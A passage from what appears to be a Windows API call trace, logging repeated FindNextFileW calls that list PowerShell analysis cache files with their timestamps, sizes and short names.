ftLastAccessTime.dwLowDateTime=0x35d1cbf7, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35d1cbf7, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x904, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_501ae8f8-02dd-491f-934b-0b1cca4e278b", cAlternateFileName="POD1BB~1")) returned 1 [0154.252] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x386afb40, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x386afb40, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x386afb40, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x2c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_52962eb4-6f26-4304-91c5-13b13840eaca", cAlternateFileName="PO407A~1")) returned 1 [0154.253] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37861a1f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37861a1f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37861a1f, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_530e40bd-1181-4b1a-b494-cb00d3b38ca3", cAlternateFileName="PO704C~1")) returned 1 [0154.254] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359af580, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x359af580, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x359af580, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xb8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_57a03622-a0b7-41b8-94dc-bd269b1a4d33", cAlternateFileName="POA6EE~1")) returned 1 [0154.254] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c11a0c, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35c11a0c, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35c11a0c, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_58329564-8f56-4d11-ae28-9ef2ef97429c", cAlternateFileName="PO45C2~1")) returned 1 [0154.254] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37a518b6, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37a518b6, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37a518b6, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_5da61b12-8578-4449-a87c-f066afc12652", cAlternateFileName="PO60DA~1")) returned 1 [0154.255] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3203ad16, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3203ad16, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3203ad16, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x987, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6163eb38-4fa6-4cec-97f6-a77939bf3a92", cAlternateFileName="POBA1A~1")) returned 1 [0154.255] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3812c403, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3812c403, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3812c403, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1c9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_623cf7f9-75e9-4808-b304-dfac4f4b5fac", cAlternateFileName="POC09E~1")) returned 1 [0154.255] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c03683, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36c03683, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36d0e629, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_63f9f2e7-0ccb-4a0f-9e81-5d068ae33845", cAlternateFileName="PO98FA~1")) returned 1 [0154.255] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c3c94c4, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x2c3c94c4, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0xf9b864ac, ftLastWriteTime.dwHighDateTime=0x1d94c37, nFileSizeHigh=0x0, nFileSizeLow=0x46d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_66782040-c243-4227-b5bb-5fce762759bc", cAlternateFileName="POC51F~1")) returned 1 [0154.256] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e545ef, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xfc07abff, ftLastWriteTime.dwHighDateTime=0x1d94c37, nFileSizeHigh=0x0, nFileSizeLow=0x239b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", cAlternateFileName="PO4D8E~1")) returned 1 [0154.256] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e0807c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e0807c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32e16752, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x662, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", cAlternateFileName="POD9C8~1")) returned 1 [0154.256] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37e57846, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37e57846, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37e57846, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x252, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6f425ebc-91a6-472d-a715-5d877ff440fe", cAlternateFileName="PO50D0~1")) returned 1 [0154.256] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47cd6d9c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32820953, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x4a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", cAlternateFileName="POWERS~1")) returned 1 [0154.257] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37f88b46, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37f88b46, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37f88b46, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_74272339-13fa-46b0-95a7-146933b5be8d", cAlternateFileName="PO96F0~1")) returned 1 [0154.257] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c11a0c, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35c11a0c, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35c11a0c, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_75f36a59-c216-4279-ab9e-509cdc5a0691", cAlternateFileName="PO164E~1")) returned 1 [0154.257] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37ba8cdc, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37ba8cdc, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37d4c9c5, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x84c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_7719477c-bf18-4df5-99a5-52654746cece", cAlternateFileName="PO27DB~1")) returned 1 [0154.258] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3305601d, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3305601d, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3305601d, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_797780fe-038f-4286-b5c9-7149f6e816f3", cAlternateFileName="PO4ACA~1")) returned 1 [0154.258] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3857e869, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3857e869, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3857e869, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x402d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_79f84b72-79a9-4377-97a7-df37b950ce76", cAlternateFileName="PO6559~1")) returned 1 [0154.258] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x373e9437, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x373e9437, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x373e9437, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x4d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_82f8a33e-c533-4902-b948-8f7a53db717e", cAlternateFileName="POC0F3~1")) returned 1 [0154.258] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37f1645d, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37f1645d, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37f1645d, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x9fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_850e50f6-4940-4aa4-8c73-f86fd360f9f8", cAlternateFileName="PO2C32~1")) returned 1 [0154.258] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3863d679, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3863d679, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3863d679, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_88fd5957-d35f-4750-8c56-f2a9fdf61218", cAlternateFileName="PO1FC9~1")) returned 1 [0154.259] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb92b7c90, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb92b7c90, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb92b7c90, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_8bdd4f74-735f-4cbb-b944-fa23a05b2f05", cAlternateFileName="PO43BC~1")) returned 1 [0154.259] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b4e3b8, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38b4e3b8, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38b746ab, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x339, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_8e5bca00-14bd-4738-97d0-bbb551c1e825", cAlternateFileName="PO52D3~1")) returned 1 [0154.259] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x375b2e57, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x375b2e57, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x375b2e57, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1067, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_9d10f893-7445-4495-9652-fedb3f7b77f8", cAlternateFileName="PO4103~1")) returned 1 [0154.259] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36017b26, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36017b26, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36017b26, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_9e5f0468-d326-48b0-b720-e75a266a9d21", cAlternateFileName="POF367~1")) returned 1 [0154.259] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb925899c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb925899c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9259cc3, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_9fd22d45-e580-4e7f-ba2a-734dfe2d9a2c", cAlternateFileName="PO274D~1")) returned 1 [0154.260] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9341bea, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb9341bea, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9341bea, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_a2539131-4889-4bfa-9cd2-9c1d6af613cf", cAlternateFileName="PO71AD~1")) returned 1 [0154.260] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cdeb73, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x34cdeb73, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x34d04d5c, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_a4f3b801-77e7-4fa4-8962-1424b0144c30", cAlternateFileName="POCBA6~1")) returned 1 [0154.260] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e27c2f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35e27c2f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35e27c2f, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x7be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_a6422695-b7a1-48de-840b-7caf543684df", cAlternateFileName="PODAE7~1")) returned 1 [0154.260] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38807012, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38807012, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38807012, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x64e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_a9f4b9ec-9a36-46be-810a-126dc7a7561e", cAlternateFileName="PO2CA2~1")) returned 1 [0154.260] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3616f15e, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3616f15e, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3616f15e, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ab4f15a1-6693-4beb-9d44-fd8c961f72f8", cAlternateFileName="PO358B~1")) returned 1 [0154.261] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x375ff43c, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x375ff43c, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3762567d, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ad39a466-719a-4082-a423-47ab17da3643", cAlternateFileName="PO1418~1")) returned 1 [0154.262] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3783b802, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3783b802, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3783b802, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x5af, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ad796bb2-a0e9-44f9-b333-9a7b4dbbf975", cAlternateFileName="POE4EE~1")) returned 1 [0154.262] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31e9c3a1, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x31e9c3a1, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x31e9c3a1, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_b6db18c8-7647-464b-9b54-5c201e6739f8", cAlternateFileName="POA322~1")) returned 1 [0154.262] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360fc870, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x360fc870, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x360fc870, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_b783357d-ab82-448d-9e81-00214b8de001", cAlternateFileName="PO7F12~1")) returned 1 [0154.262] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3201498e, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3201498e, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3201498e, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x987, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_b9568c4e-2934-4c2e-8df6-a5433cbe2b9a", cAlternateFileName="PO11F2~1")) returned 1 [0154.262] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x367fd745, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x367fd745, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x367fd745, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1342, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_c47e0ba3-4c20-4f8f-bfe7-f754db3a0ef9", cAlternateFileName="PO9891~1")) returned 1 [0154.263] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c4627f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x34c4627f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x34c4627f, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x75b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ca7e3dc6-5afd-459b-a05d-6e21e0aa1745", cAlternateFileName="PO9CDA~1")) returned 1 [0154.263] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b9f37a, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35b9f37a, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35b9f37a, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cb15acff-42c8-42d0-8e52-8e08b8d8c854", cAlternateFileName="POE240~1")) returned 1 [0154.263] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47dbbb94, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47dbbb94, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x328b9354, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x717, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", cAlternateFileName="POWERS~4")) returned 1 [0154.263] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b4e3b8, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38b4e3b8, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38b4e3b8, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1eb, dwReserved0=0x0, dwReserved1=0x0, 